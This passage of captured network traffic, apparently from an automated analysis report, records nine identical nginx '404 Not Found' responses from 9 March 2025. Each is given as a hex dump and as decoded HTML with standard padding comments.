    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Sun, 09 Mar 2025 12:54:14 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Sun, 09 Mar 2025 12:54:16 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Sun, 09 Mar 2025 12:54:18 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Sun, 09 Mar 2025 12:54:45 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Sun, 09 Mar 2025 12:54:47 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Sun, 09 Mar 2025 12:54:49 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Sun, 09 Mar 2025 12:54:52 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Sun, 09 Mar 2025 12:55:18 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Sun, 09 Mar 2025 12:55:21 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
